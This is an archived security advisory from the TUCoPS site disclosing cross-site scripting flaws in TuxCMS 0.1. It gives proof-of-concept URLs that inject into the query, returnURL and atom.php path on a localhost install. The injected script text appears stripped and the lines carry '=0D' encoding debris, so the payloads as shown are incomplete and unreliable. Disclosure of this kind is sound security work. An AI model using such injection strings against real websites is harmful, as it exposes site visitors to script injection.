TUCoPS :: Web :: CMS / Portals :: bx3092.htm

TuxCMS All Version multiple vulns
Multiple XSS In TuxCMS All Version
Multiple XSS In TuxCMS All Version


=0D
Author : Hadi Kiamarsi=0D
-------------------------------------------=0D
Discovered by : Hadi Kiamarsi=0D
-------------------------------------------=0D
Exploited By : Hadi Kiamarsi=0D
-------------------------------------------=0D
E-Mail : hadikiamarsi[at]hotmail.com=0D
-------------------------------------------=0D
WebSite : http://ircrash.com=0D 
-------------------------------------------=0D
Our Team : ircrash=0D
-------------------------------------------=0D
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr=0D
-------------------------------------------=0D
=0D
CMS: tuxcms-0.1 CMS ( All Version Vulnerable ) =0D
Download CMS : http://dfn.dl.sourceforge.net/sourceforge/tuxcms/tuxcms-0.1.tar.bz2=0D 
=0D
-------------------------------------------=0D
=0D
                            XSS=0D
Exploit : =0D
=0D
query : =0D">http://localhost/?q=>">=0D 
query : =0D">http://localhost/tux-login.php?returnURL=>">=0D 
query : =0D">http://localhost/tux-login.php?returnURL=%00"">=0D 
=0D
-------------------------------------------=0D
                            Cross Site URI=0D
=0D
query : =0D">http://localhost/tux-syndication/atom.php/>">=0D 
=0D
-------------------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH